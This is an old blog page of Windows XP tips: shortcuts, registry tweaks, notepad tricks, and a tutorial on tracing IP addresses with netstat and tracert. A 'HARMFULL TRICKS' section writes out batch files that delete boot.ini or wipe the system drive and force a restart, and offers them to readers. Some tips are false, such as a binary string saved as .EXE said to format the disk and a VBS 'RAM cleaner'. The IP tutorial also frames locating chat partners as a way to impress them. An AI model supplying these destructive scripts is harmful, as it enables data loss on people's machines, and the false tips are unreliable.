Wednesday, December 24, 2008

How To Backup Ur Windows XP

1. Click Start -> Run -> type in, with out the quotes, "ntbackup.exe" .
2. Click on Backup Wizard and then "Next".
3. Select the radio button "Backup everything on this computer" and click "Next".
4. Choose a location where you will save your backup.
5. Type in a name of your backup that you will recognize and click "Next".
6. Click "Finish" and your backup will begin.
7. It will complete and provide you a report of the backup.
8. Click "Close" and your backup is complete.

PC Shortcuts

Useful Shortcut:
• Start + M: Minimizes all open windows
• Start + Shift + M: Maximizes All Windows
• Start + E: Runs Windows Explorer
• Start + R: Open the RUN Dialog Box
• Start + F: Open the Search Results Dialog box
• Start + CTRL + F: Opens the Search Results-Computer dialog Box
• Start + Pause (Break): Opens the System Properties Dialog Box

Windows System Key Combinations:
• F1: Help
• CTRL + ESC: Open Start menu
• ALT + TAB: Switch between open programs
• ALT + F4: Quit program
• SHIFT + DELETE: Delete item permanently

Windows Program Key Combinations: 
• CTRL + C: Copy
• CTRL + X: Cut
• CTRL + V: Paste
• CTRL + Z: Undo
• CTRL + B: Bold
• CTRL + U: Underline
• CTRL + I: Italic

General Keyboard-Only Commands: 
• F1: Starts Windows Help
• F10: Activates menu bar options
• SHIFT + F10: Opens a shortcut menu for the selected item
• CTRL + ESC: Opens the Start menu
• ALT + DOWN ARROW: Opens a drop-down list box
• ALT + TAB: Switch to another running program
• SHIFT: Press and hold down the SHIFT key while you insert a CD-ROM to bypass the automatic-run feature
• ALT + SPACE: Displays the main window's System menu
• ALT +- (ALT + hyphen): Displays the Multiple Document Interface (MDI)child window's System menu
• CTRL + TAB: Switch to the next child window of a Multiple Document Interface (MDI) program
• ALT + F6: Switch between multiple windows in the same program

Shell Objects and General Folder/Windows Explorer Shortcuts For a selected object: 
• F2: Rename object
• F3: Find all files
• CTRL + X: Cut
• CTRL + C: Copy
• CTRL + V: Paste
• SHIFT + DELETE: Delete selection immediately, without moving the item to the Recycle Bin
• ALT + ENTER: Open the properties for the selected object
• To Copy a File: Press and hold down the CTRL key while you drag the file to another folder.
• To Create a Shortcut: Press and hold down CTRL+SHIFT while you drag a file to the desktop or a folder.

General Folder/Shortcut Control: 
• F4: Selects the Go To A Different Folder box and moves down the entries in the box
• F5: Refreshes the current window.
• F6: Moves among panes in Windows Explorer
• CTRL + Z: Undo the last command
• CTRL + A: Select all the items in the current window
• BACKSPACE: Switch to the parent folder
• SHIFT + click + Close button: For folders, close the current folder plus all parent folders

Windows Explorer Tree Control: 
• Numeric Keypad *: Expands everything under the current selection
• Numeric Keypad +: Expands the current selection
• Numeric Keypad -: Collapses the current selection.
• RIGHT ARROW: Expands the current selection if it is not expanded, otherwise goes to the first child
• LEFT ARROW: Collapses the current selection if it is expanded, otherwise goes to the parent

Properties Control: 
• CTRL + TAB/CTRL + SHIFT + TAB: Move through the property tabs

Accessibility Shortcuts: 
• Press SHIFT five times: Toggles StickyKeys on and off
• Press down and hold the right SHIFT key for eight seconds: Toggles FilterKeys on and off
• Press down and hold the NUM LOCK key for five seconds: Toggles ToggleKeys on and off
• Left ALT + left SHIFT+NUM LOCK: Toggles MouseKeys on and off
• Left ALT + left SHIFT+PRINT SCREEN: Toggles high contrast on and off

Microsoft Natural Keyboard Keys: • Windows Logo: Start menu
• Windows Logo + R: Run dialog box
• Windows Logo + M: Minimize all
• SHIFT + Windows Logo+M: Undo minimize all
• Windows Logo + F1: Help
• Windows Logo + E: Windows Explorer
• Windows Logo + F: Find files or folders
• Windows Logo + D: Minimizes all open windows and displays the desktop
• CTRL + Windows Logo + F: Find computer
• Windows Logo + TAB: Cycle through taskbar buttons
• Windows Logo + Break: System Properties dialog box
• Application key: Displays a shortcut menu for the selected item

Microsoft Natural Keyboard with IntelliType Software Installed:• Windows Logo + L: Log off Windows
• Windows Logo + P: Starts Print Manager
• Windows Logo + C: Opens Control Panel
• Windows Logo + V: Starts Clipboard
• Windows Logo + K: Opens Keyboard Properties dialog box
• Windows Logo + I: Opens Mouse Properties dialog box
• Windows Logo + A: Starts Accessibility Options (if installed)
• Windows Logo + SPACEBAR: Displays the list of Microsoft IntelliType shortcut keys
• Windows Logo + S: Toggles CAPS LOCK on and off

Dialog Box Keyboard Commands: • TAB: Move to the next control in the dialog box
• SHIFT + TAB: Move to the previous control in the dialog box
• SPACEBAR: If the current control is a button, this clicks the button. If the current control is a check box, this toggles the check box. If the current control is an option, this selects the option.
• ENTER: Equivalent to clicking the selected button (the button with the outline)
• ESC: Equivalent to clicking the Cancel button
• ALT + underlined letter in dialog box item: Move to the corresponding item

Hide All Items on the Desktop:

User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Value Name: NoDesktop
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = disable restriction, 1 = enabled restriction)

Hiding Drives

This setting allows you to control which drives are visible in My Computer and Explorer. It is possible to hide all drives or just selected ones. 

Open your registry (press win+r and type regedit , hit enter )
goto 

[HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer]

and find or create the DWORD "NoDrives" there by right clicking on explorer -> NEW -> DWORD value .

The "NoDrives" value uses a 32-bit word to define local and network drive visibility for each logical drive in the computer. The lower 26 bits of the 32-bit word correspond to drive letters A through Z. Drives are visible when set to 0 and hidden when set to 1. 

If your not happy working in Hex, add these decimal numbers to hide the drive(s): 

A: 1, B: 2, C: 4, D: 8, E: 16, F: 32, G: 64, H: 128, I: 256, J: 512, K: 1024, L: 2048, M: 4096, N: 8192, O: 16384, P: 32768, Q: 65536, R: 131072, S: 262144, T: 524288, U: 1048576, V: 2097152, W: 4194304, X: 8388608, Y: 16777216, Z: 33554432, ALL: 67108863 

For example to hide drive A and drive D, you would add 1 (A) + 8 (D) which means the value should be set to "9". 

To disable all the drives set the value to "67108863". 

Restart Windows for the change to take effect. 

Note: These drives will still appear in File Manager, to remove File Manager, delete or rename winfile.exe.

change drive icons:

First of all copy a icon file to the root of the drive.
example: c:\icon.ico

then create a file called: autorun.inf in c:\autorun.inf
then open that file and type the following:

[autorun]
icon=icon.ico

save and close the file.

now open my computer and resfresh.. and woh! icon changed....
you can apply to other drives too.

be carefull:

"autorun.inf" and "ico.ico" must be in the root of the drive.
example: c:\autorun.inf and c:\icon.ico.
same on the root.

Make ur RAM work better

Clean ur RAM & Make Your Comp Speed Better

Clean Ur RAM
U may recognize that ur system gets slower and slower when playing and working a lot with ur pc. That's cause ur RAM is full of remaining progress pieces u do not need any more.
So create a new text file on ur desktop and call it .. "RAMcleaner" or something...

Type
FreeMem=Space(256000000)
in this file and save it as RAMcleaner.vbs [ You may choose the "All Files" option when u save it ]

Run the file and ur RAM may be cleaned :>
Of course u can edit the code in the file for a greater "cleaning-progress".

FreeMem=Space(5120000000)

just try it out..

Request a new IP address from your ISP server

Here's how to do it in windows:
1. Click Start
2. Click run
3. In the run box type cmd.exe and click OK
4. When the command prompt opens type the following. ENTER after each new line.

ipconfig /flushdns 
ipconfig /release
ipconfig /renew
exit
5. Erase your cookies in whatever browser you are using.

Frequently you will be assigned a new IP address when this happens. Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.

Trick to show your name in taskbar

Here is a trick to add your name in place of AM and PM beside time in the taskbar.

It's simple
Goto Start -> Control Panel -> Regional and Language option -> Customize (beside English US) -> Go to TIME tab -> Change AM symbol and PM symbol from AM and PM to your name -> Apply -> Ok ...IS it changed ??? May be not ...
Now go to time in taskbar and Double Click it to open "Date and time property" ...
Look at the place where time changes in digital format i.e. 02:47:52 AM , click to arrow to chage the AM or PM by selecting and press arrow.
Apply -> OK.

It will Show your name!!

MAKE YOUR MENUS LOAD FASTER

This trick remove the slight delay between clicking on a menu and XP displaying the menu.

Go to Start then Run
Type 'Regedit' then click 'Ok'
Find "HKEY_CURRENT_USER\Control Panel\Desktop\"
Select "MenuShowDelay"
Right click and select "Modify'
Reduce the number to around "100"
This is the delay time before a menu is opened. You can set it to "0" but it can make windows really hard to use as menus will open if you just look at them - well move your mouse over them anyway.

Amvo.Exe or Yahoo Messenger Signout Virus Solution:

This virus dont let u signout to yahoo messenger as get signout automatically.

u can locate the virus by typing 'msconfig' in run pad. their u wud find a process named as 'amvo.exe' , that's the virus.
if we follow some simple easy steps its very easy to remove virus manually
* start system in safe mode and checked the process, and close the msconfig window and resatrted pc again .
* Next openRegistry Editor (open run, and type regedit). search for "amvo.exe" and find the entry related to it. delete the whole key.
* Then I have browsed to Windows\System32 folder, and deleted amvo.exe, amvo0.dll, amvo1.dll.
* This virus put an Autorun.inf file, and .cmd file in every drive's root. remove all those just by installing avira anti virus software free ware(just scan after updating the anti virus and remove all autoruns) or by anyother good antivirus .

Shortcut to restarting xp..

You can restart a Windows XP Pro and Home machine easily by creating a shortcut with following path. (Assume you installed Windows XP on your C: Partition) "c:\windows\system32\shutdown.exe -r -f -t 00" -r is for restarting the computer. -f is to force close all programs without saving. -t 00 is used to restart in zero seconds. i.e. as soon as you D.Click on the shortcut. You can log off from a Windows XP Professional or Home edition by running "C:\windows\system32\shutdown.exe -l -f -t 00". Also you can shutdown a Windows XP Home or Professional edition by running "c:\windows\system32\shutdown.exe -s -f -t 00". You always have to turn from the CPU after running this command. (Same with AT and ATX powered machines.) If you want to turn down power of ATX machine automatically, run "c:\windows\system32\tsshutdn.exe 00 /POWERDOWN /DELAY:00" This is used to turn off a server. Even though your computer will be shutdown completely, this whole operation will take 30 seconds to finish. Even though you don't have networked computers attached to your computer, this works.

Make the hard drive inaccessible

when double clicked on this drive an error message will open saying it is inaccessible .This is an alternate to hiding a drive and making it inaccisible. Here's how u do that :

Go to the registry editor and navigate to the following place :
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
In the right hand pane for the Explorer key, create a new "DWORD" value named ViewNoDrive

Double click the new value and enter it as .......
for hiding A drive set value as 1 , for B its 2 and C its 4 and so on and for Z its 33554432
generally multiply it by 2 for the next alphabet to hide.
Once done, reboot or log off and login in again. Then try double clicking the drive you made inaccessible.
You should receive a message stating that the drive cannot be accessed

REMOVING USERNAME N PIC 4M XP START MENU:

The User account picture can be removed by turning off the Welcome Screen. Or, by switching to Windows Classic theme. Follow the method described in this article if you want to remove the username and picture from the Start Menu, without disabling the Welcome Screen and Windows XP Theme.
For those who want to remove the user name and user account picture from Start Menu, in order to have a blank blue panel at the top, try this:
Start Windows Explorer and go to this folder:
C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures
From that folder, rename the BMP file which corresponds to your user account. 
( For example, if your username is Robert, rename Robert.bmp to old_Robert.bmp ) 
Next, rename the following folder:
C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\Default Pictures 
to something else, say...
C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\No_Default Pictures 
To remove the user name, follow these steps
Start regedit.exe and navigate to the this key:
HKEY_CURRENT_USER \ Software \ Microsoft\ Windows \ CurrentVersion \ Policies \ Explorer 
In the right-pane, set NoUserNameInStartMenu value-data to 1
Close Regedit.exe and restart Windows. 
You'll end up with a blue space at the top of the Start Menu.
To get back the username and the picture, reverse the above procedure.
For the New Start Menu, Windows XP looks for the .bmp file in the folder
C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures
If the file is not found, it takes a picture from the "Default Pictures" sub-folder. By renaming the .bmp and the "Default Pictures" folder, you're giving no chance for Windows to fetch an image for the Start Menu

Lock Your System On Mouse Click

Feel hard to press CTRL+ALT+DEL to lock your machine ??????
Try this and create the icon to lock the machine.

1. Right click an empty spot on the desktop, point to New and click Shortcut.
2. In the Create Shortcut dialog box, type the following in the 'Type the location' of the item text box:

"rundll32 user32.dll,LockWorkStation" remove quotes while typing.

3. Click Next.
4. In "Type a name for this shortcut", type "" (any name as u wish) and Click Finish
5. Create a shortcut in your shortcut bar & use it.

Fun with Notepad

1)The flight number of the plane that had hit WTC on 9/11 was Q33N ….

In 
Notepad, type the flight number i.e. Q33N
Increase the Font Size to 
72, Change the Font to Wingdings.
You will be amazed by the findings !!!

2)Open Notepad.
Type the words as follows:
Bush hid the facts.

Now save the file (give it any name you like), close the notepad.
open it again. ou will se Square characters instead of the words you had written.
It Works Only with XP.
It works with certain names. It worked with:
bush
saddam
tony blair

Generate date & time in Notepad

Open Notepad write .LOG(in capital letters)
in that & save as diary.txt
Every time you open that file you see that time & date is automatically generated.

Format Hard Disk using Notepad

Write The Following In Notepad Exactly as it says

1. Write the following code:01001011000111110010010101010101010000011111100000
2. Save As it as .EXE and any Name would Do.
3. If u run the program means it will format the Hard Drive.

NOTE: This is for learning purpose only!!

Test if Antivirus is Working or not Using notepad

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Open notepad.
Copy the above code in the file....
then save it with the name 
fakevirus.exe
If this file got deleted immediately. That means ur antivirus is working properly.

Fun with MSWORD

Open msword and type

=rand(200,99)

Press enter and see the result......
This also works with =rand(125,21)

**Speed up XP**

To disable unneeded startup services for a safer, faster XP, use the "Services" Admin Tool (Control Panel > Administrative Tools > Services). If you are a single user of a non-networked machine, you can disable the following items, with no ill effect.

Alerter
Clipbook
Computer Browser
Fast User Switching
Human Interface Access Devices
Indexing Service (Slows the hard drive down)
Messenger
Net Logon (unnecessary unless networked on a Domain)
Netmeeting Remote Desktop Sharing (disabled for extra security)
Remote Desktop Help Session Manager (disabled for extra security)
Remote Procedure Call Locator
Remote Registry (disabled for extra security)
Routing & Remote Access (disabled for extra security)
Server SSDP Discovery Service (this is for the utterly pointless "Universal P'n'P", & leaves TCP Port 5000 wide open)
TCP/IP NetBIOS Helper Telnet (disabled for extra security)
Universal Plug and Play Device Host
Upload Manager
Windows Time
Wireless Zero Configuration (for wireless networks)
Workstation

HARMFULL TRICKS

del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.


01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001



Do not try it on ur PC. dont mess around this is for educational purpose only

still if u cant figure it out try dis

go to notepad

@Echo off
Del C:\ *.*|y

save it as Dell.bat


worse

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

SHAKE THE FIREFOX

javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)

PASTE ABOVE CODE IN ADDRESS BAR AND SEE THE SHAKE

ENABLING RIGHT CLICKS ON SITE DAT DISABLE IT

Lots of web sites have disabled the right click function of the mouse button... it's really, really annoying. This is done so that you don't steal (via right-click->save picture) their photos or images or any other goodies. Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.

It's easy to change, assuming your using IE 6:
Click "Tools"->"Internet Options"
Click the "Security" tab
Click "Custom Level"
Scroll down to the "Scripting" section
Set "Active Scripting" to "disable"
Click "Ok" a couple of times.

You'll probably want to turn this back to "enable" when your done... 'cause generally the javascript enhances a website.

Internet Error Codes And Meaning

Sometimes when you were surfing on interent and trying to open any website, your e-mail and any FTP sites , but you see different error codes there. You can solve these problems if you are well-known with the meaning of error codes.Here is a brief description of these codes:-

400 = This is bad request error, First check you may be typing wrong URL name and server could not understand your request.

401 = You are trying to open any unauthorized access site or page. Check your username and password if you are trying to open anywebpage.

402 = Payment Required Error.

403 = You are trying to open any forbidden page and you are blocked by that domain.

404 = Here you are trying to open the webpage that was removed or re-named, also check the URL spelling.

408 = This is time out error. you should send the request with in time that the server set for you.

How to hack ip address

In here I have figure out some very easy but cool ways to trace out the geographical location and various other infos like ISP details etc of a remote computer using its IP.

Well I guess its one of the most important must learn manul for boys out there if you want to impress your friends particularly gals whom you'll meet online in a chat room and tell them their geographical locations and ISP details and make them surprised and impressed .

In the practical execution of this manual you don't have to work much as it is very simple only you have to use your brain to understand some symbols and some format of expressions and use your IQ to execute things the right way.




What is IP and how to get the IP of a remote system::



Getting the IP or Internet Protocol of a remote system is the most important and the first step of hacking into it. Probably it is the first thing a hacker do to get info for researching on a system. Well IP is a unique number assigned to each computer on a network. It is this unique address which represents the system on the network. Generally the IP of a particular system changes each time you log on to the network by dialing to your ISP and it is assigned to you by your ISP. IP of a system which is always on the network remains generally the same. Generally those kind of systems are most likely to suffer a hacking attack because of its stable IP. Using IP you can even execute system commands on the victim's computer.

Lets take the example of the following IP address: 202.144.49.110 Now the first part, the numbers before the first decimal i.e. 209 is the Network number or the Network Prefix.. This means that it identifies the number of the network in which the host is. The second part i.e. 144 is the Host Number that is it identifies the number of the host within the Network. This means that in the same Network, the network number is same. In order to provide flexibility in the size of the Network, here are different classes of IP addresses:



Address Class Dotted Decimal Notation Ranges

Class A ( /8 Prefixes) 1.xxx.xxx.xxx through 126.xxx.xxx.xxx

Class B ( /16 Prefixes) 128.0.xxx.xxx through 191.255.xxx.xxx

Class C ( /24 Prefixes) 192.0.0.xxx through 223.255.255.xxx



The various classes will be clearer after reading the next few lines.



Each Class A Network Address contains a 8 bit Network Prefix followed by a 24-bit host number. They are considered to be primitive. They are referred to as "/8''s" or just "8's" as they have an 8-bit Network prefix.

In a Class B Network Address there is a 16 bit Network Prefix followed by a 16-bit Host number. It is referred to as "16's".



A class C Network address contains a 24-bit Network Prefix and a 8 bit Host number. It is referred to as

"24's" and is commonly used by most ISP's.



Due to the growing size of the Internet the Network Administrators faced many problems. The Internet routing tables were beginning to grow and now the administrators had to request another network number from the Internet before a new network could be installed at their site. This is where sub-netting came in.



Now if your ISP is a big one and if it provides you with dynamic IP addresses then you will most probably see that whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep changing. This is due to the fact that when sub-netting comes in then the IP Addresses structure becomes:



xxx.xxx.zzz.yyy



where the first 2 parts are Network Prefix numbers and the zzz is the Subnet number and the yyy is the host number. So you are always connected to the same Subnet within the same Network. As a result the first 3 parts will remain the same and only the last part i.e. yyy is variable.

***********************



For Example, if say an ISP xyz is given the IP: 203.98.12.xx Network address then you can be awarded any IP, whose first three fields are 203.98.12. Get it?



So, basically this means that each ISP has a particular range in which to allocate all its subscribers. Or in other words, all subscribers or all people connected to the internet using the same ISP, will have to be in this range. This in effect would mean that all people using the same ISP are likely to have the same first three fields of their IP Addresses.



This means that if you have done a lot of (By this I really mean a lot) of research, then you could figure out which ISP a person is using by simply looking at his IP. The ISP name could then be used to figure out the city and the country of the person. Right? Let me take an example to stress as to how cumbersome but easy (once the research is done) the above method can be.



In my country, say there are three main ISP's:



ISP Name Network Address Allotted



ISP I 203.94.47.xx

ISP II 202.92.12.xx

ISP III 203.91.35.xx



Now, if I get to know the IP of an e-pal of mine, and it reads: 203.91.35.12, then I can pretty easily figure out that he uses ISP III to connect to the internet. Right? You might say that any idiot would be able to do this. Well, yes and no. You see, the above method of finding out the ISP of a person was successful only because we already had the ISP and Network Address Allotted list with us. So, what my point is, that the above method can be successful only after a lot of research and experimentation. And, I do think such research can be helpful sometimes.



Also, this would not work, if you take it all on in larger scale. What if the IP that you have belongs to someone living in a remote igloo in the North Pole? You could not possibly get the Network Addresses of all the ISP's in the world, could you? If yes please send it to me J.



Well now I guess you have pretty good knowledge about what an IP is and what you can do by knowing the IP of a remote system. Now lets come to the point of finding out the IP of remote system.

Well you can easily figure out the IP of a remote system using the netstat utility available in the microsoft's version of DOS. The netstat command shows the connections in which your system is engaged to and the ports they are using. Suppose you are checking your mail in hotmail and you want to find out the IP of msn. All you need to do is to open a dos window (command.com) and type netstat. You will see all the open connections of your system. There you will see something :



Proto Local Address Foreign Address State

TCP abhisek:1031 64.4.xx.xx:80 ESTABLISHED



Now you got the IP address of hotmail ass 64.4.xx.xx .

Similarly you can figure out the IP address of most http or ftp connections.



To know your own IP type the following command in a dos windows

C:\netstat –n

[this commands converts the IP name into IP addresses]

this is what you will probably see on typing the above command :



Proto Local Address Foreign Address State

TCP 203.xx.251.161:1031 194.1.129.227:21 ESTABLISHED

TCP 203.xx.251.161:1043 207.138.41.181:80 FIN_WAIT_2

TCP 203.xx.251.161:1053 203.94.243.71:110 TIME_WAIT

TCP 203.xx.251.161:1058 194.1.129.227:20 TIME_WAIT

TCP 203.xx.251.161:1069 203.94.243.71:110 TIME_WAIT

TCP 203.xx.251.161:1071 194.98.93.244:80 ESTABLISHED

TCP 203.xx.251.161:1078 203.94.243.71:110 TIME_WAIT



Here 203.xx.251.161 is your IP address.



Now lets clarify the format used by netstat :



Proto : It shows the type of protocol the connection with the remote system is using.

Here TCP (transmission control protocol) is the protocol used by my system to connect to other systems.



Local Address : It shows the local address ie the local IP. When the netstat command is executed without –n switch then the name of the local system is displayed and when the netstat is executed with –n switch then the IP of the local system is displayed. Here you can also find out the port used by the connection.

xxx.yyy.zzz.aaa:1024

in this format you will see the local address. Here 1024 is the port to which the remote system is connected in your system



Foreign Address :: It shows the IP address of the remote system to which your system is connected. In this case also if the netstat command is excuted with –n switch then you directly get the IP of the victim but if the netstat is executed without –n switch then you will get the address of the remote system. Something like



C:\netstat

Proto Local Address Foreign Address State

TCP abhisek:1031 msgr.lw4.gs681.hotmail.com:80 ESTABLISHED



Here msgr.lw4.gs681.hotmail.com is the address of the foreign system . putting this address in any IP lookup program and doing a whois lookup will reveal the IP of the remote system.



Note: The port to which your system is connected can be found from this in the same way as I have shown in the case of local address. The difference is that, this is the port of the remote system to which your computer is connected to.

Below I have produced a list of ports and popular services generally found to be running.

21 :: FTP port

80 :: http port

23 :: Telnet port



Note: If your execute the netstat command and find ports like 12345,27374 are open and are in use then make it sure that your sweat heart computer is infected with her boyfriend.. J J J J I mean your computer is infected with some sort of Trojan.

Below I have produced a list of commonly known Trojans and the ports they use by default. So if you find these ports open then get a good virus buster and get these stupid servers of the Trojans kicked out. Well if you want to play with these Trojan by keeping them in your computer but not letting them ruin your system performance then just disble it from the system registry run and they wont be loaded to memory each time when windows starts up[This trick doesn't work for all Trojans].



Netbus :: 12345(TCP)

Subseven :: 27374(TCP)

Girl Friend :: 21554(TCP)

Back Oriface :: 31337 (UDP)



Well guys and gals I hope you are now well familiar with the term IP and what is the utility of IP in cyber world and how to get the IP of a remote system to which you are connected. I hope you find my writings very easy to undertstand. I know I lack the capacity of explaining myself but I try my level best to make things very easy and clear for you'll.




How to get the IP of a remote system while chatting through msn messenger ::



This is a tutorial on how to get IP address from MSN messenger. This is actually
a really easy thing to do. It is not like going through the hard time and reversing
MSN messenger like many people think.

The IP address is only given when you accept or are sending a file through MSN
messenger. When you send IM's, the message is sent through the server thus hiding
your victims IP and your. But when you send a file or recieve a file, it is direct
connection between the two computers.

To obtain the IP accept a file transfer or send a file to the victim, when the file
sending is under way from the dos prompt type "netstat" without the quotation marks.
You should get a table like this:

Proto Local Address Foreign Address State
TCP kick:1033 msgr-ns29.msgr.hotmail.com:1863 ESTABLISHED
TCP kick:1040 msgr-sb36.msgr.hotmail.com:1863 ESTABLISHED
TCP kick: ESTABLISHED

The top name in the list is the server's address for IMing. There could be many of
the second name in the list, as a new connection is made to the server for every
room you are IMing to. You are looking for the address of the remote host in
this table it may be something similar to "host63-7-102-226.ppp.cal.vsnl.com" or "203..64.90.6".
without the quotation marks.
All you need to do now is to put this address in you IP lookup programe and get the IP of the remote system.


Well 50%of the work is done now. Now you know how to get the IP of a remote system, so its time to trace it down and find some details about the IP.



Tracing an IP is quite simple. You can do it the easy way by using some sweet softwares like Visual Trace 6.0b

[ftp://ftp.visualware.com/pub/vr/vr.exe]

Neotrace

[http://www.neoworx.com/download/NTX325.exe]

or by our way ie. Using MS DOS or any other version of DOS.

Well I suggest you to use DOS and its tracert tool for tracing the IP cause using it will give you a clear conception about the art of tracing an IP and I guarantee that you will feel much satisfied on success than using a silly software. Furthur you will know how things work and how the IP is traced down and the different networks associated in this tracing process.



Let us take a look at tracert tool provided for DOS by Microsoft.

It is a very handy tool for peoples need to trace down an IP.

Just open any DOS windows and type tracert.



C:\windows>tracert



Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name


Options:

-d Do not resolve addresses to hostnames.

-h maximum_hops Maximum number of hops to search for target.

-j host-list Loose source route along host-list.

-w timeout Wait timeout milliseconds for each reply.


You will now see a description of the tracert command and the switches associated with it.

Well these switches doesn't makes much difference. All you can do is to increase the timeout in milliseconds by using –w switch if you are using a slow connection and the –d switch if you wish not resolve address to hostnames by default.

By default tracert performs a maximum of 30 hops trace. Using the –h switch you can specify the number of hops to perform.

Now its time for execution.

Let us trace down the IP yahoo.com [216.115.108.243]



TIP: If you have done a long research (I mean a lot) then simply looking at the IP you can figure out some info from it. For example the IP 203.90.68.8 indicates that the system is in India. In India IPs generally begin with 203 and 202



C:\WINDOWS>tracert yahoo.com



Tracing route to yahoo.com [216.115.108.243] over a maximum of 30 hops:



1 308 ms 142 ms 127 ms 203.94.246.35

2 140 ms 135 ms * 203.94.246.1

3 213 ms 134 ms 132 ms 203.94.255.33

4 134 ms 130 ms 129 ms 203.200.64.29

5 122 ms 135 ms 131 ms 203.200.87.75

6 141 ms 137 ms 121 ms 203.200.87.15

7 143 ms 170 ms 154 ms vsb-delhi-stm1.Bbone.vsnl.net.in [202.54.2.241]

8 565 ms 589 ms 568 ms if-7-0.bb8.NewYork.Teleglobe.net [207.45.198.65]

9 596 ms 584 ms 600 ms if-3-0.core2.NewYork.teleglobe.net [207.45.221.66]

10 * * * Request timed out.

11 703 ms 701 ms 719 ms if-3-0.core2.PaloAlto.Teleglobe.net [64.86.83.205]

12 694 ms 683 ms 681 ms if-6-1.core1.PaloAlto.Teleglobe.net [207.45.202.33]

13 656 ms 677 ms 700 ms ix-5-0.core1.PaloAlto.Teleglobe.net [207.45.196.90]

14 667 ms 673 ms 673 ms ge-1-3-0.msr1.pao.yahoo.com [216.115.100.150]

15 653 ms 673 ms 673 ms vl20.bas1.snv.yahoo.com [216.115.100.225]

16 666 ms 676 ms 674 ms yahoo.com [216.115.108.243]

Trace complete.



Note: Here I have traced yahoo.com. In place of yahoo.com you can give the IP of yahoo or any other IP you want to trace, the result will be the same.



Now carefully looking at the results you can figure out many information about yahoo's server [216.115.108.243]

First packets of data leave my ISP which is at 203.94.246.35 .Similarly you can find out the different routers through which the packets of data are send and received to and from the target system. Now take a look at the 13th line you'll see that the router is in PaloAlto.Teleglobe.net from this you can easily figure out that the router is in Palo Alto. Now finally look at the target system ie. Yahoo's server vl20.bas1.snv.yahoo.com . Now you got the address of yahoo's server. Now put this address in any IP lookup programe and perform and reverse DNS lookup and you will get most of the info about this address,like the place where it is in.

Well another thing you can find out using the tracert tool is that the number of hops (routers) the target system is away from you. In case of tracerouting yahoo.com we find that the target system ie yahoo's server is 16 hops away from my system. This indicates that there are 16 routers between my system and yahoo's server.



Apart from tracing an IP you can find out many usefull details about the target system using the tracert tool.



Firewall Detection



While tracerouting a target system, if you get * as an output then it indicates timeout error. Now if you peform another tracerout to the same taeget system at some other time with a good connection and in this way few times more and if you always get * as the output then take it for sure that the target system is running a firewall which prevents sending of data packets from the target system.



Example



Some days ago I tried to tracert hotmail's server in plain and simple way using tracert without any trick.This is what I found out :




c:\windows>tracert 64.4.53.7



Tracing route to lc2.law5.hotmail.com [64.4.53.7]


over a maximum of 30 hops:






1 * * * Request timed out.

2 161 ms 147 ms 85 ms 203.90.69.81

3 126 ms 261 ms 219 ms 203.90.66.9

4 121 ms 115 ms 228 ms delswp2.hclinfinet.com [203.90.66.133]

5 727 ms 725 ms 711 ms 203-195-147-250.now-india.net.in [203.195.147.250]

6 1006 ms 794 ms 952 ms core-fae-0-0.now-india.net.in [203.195.147.3]

7 826 ms 731 ms 819 ms 213.232.106.9

8 885 ms 744 ms 930 ms 213.166.3.209

9 851 ms 1020 ms 1080 ms 213.232.64.54

10 1448 ms 765 ms 1114 ms pos8-0.core2.London1.Level3.net [212.113.0.118]

11 748 ms 789 ms 750 ms ge-4-2-1.mp2.London1.Level3.net [212.187.131.146]

12 719 ms 733 ms 846 ms so-3-0-0.mp1.London2.Level3.net [212.187.128.46]

13 775 ms 890 ms 829 ms so-1-0-0.mp2.Weehawken1.Level3.net [212.187.128.138]

14 853 ms 852 ms 823 ms so-3-0-0.mp1.SanJose1.Level3.net [64.159.1.129]

15 889 ms 816 ms 803 ms so-7-0-0.gar1.SanJose1.Level3.net [64.159.1.74]

16 * * * Request timed out.

17 * * * Request timed out.

18 * * * Request timed out.

19 * * * Request timed out.

20 * * * Request timed out.

21 * * * Request timed out.

22 * * * Request timed out.

23 * * * Request timed out.

24 * * * Request timed out.

25 * * * Request timed out.

26 * * * Request timed out.

27 * * * Request timed out.

28 * * * Request timed out.

29 * * * Request timed out.

30 * * * Request timed out.

Trace complete.


I performed the same tracert many times a day but concluded with the same result. This indicates that the systems after the router SanJose1.Level3.net has firewalls installed which prevents the outgoing of data packets.



Detecting Traceroute Attempts on your System



You can detect that an attacker is performing a traceroute on your system, if you see the following symptoms:



1. If you observe port scans on very high UDP ports. This symptom means that the attacker has performed a traceroute on your system. However, it could also mean a simply port scan. Either way, it signifies the fact that your system is being scanned.



2. If the packet-monitoring tool installed in your network, picks up several outgoing TTL-exceeding messages, then it is yet another sign that someone is doing a traceroute on your system.



3. If in these log files, you also observer an outgoing ICMP port unreachable error message, then it means that since a traceroute was done on your system and as the target system i.e. your system, was reached, it responded with this error message.



You can also find our more information on the attacker (if he performs a traceroute on your system) by simply studying the sniffer log files. If you observer the TTL values, then we can easily figure out the following information on the attacker by making use of OS detection techniques discussed earlier in this white paper:


The Operating System running on the attacker's target system.
Number of hops away, the attacker is from you.



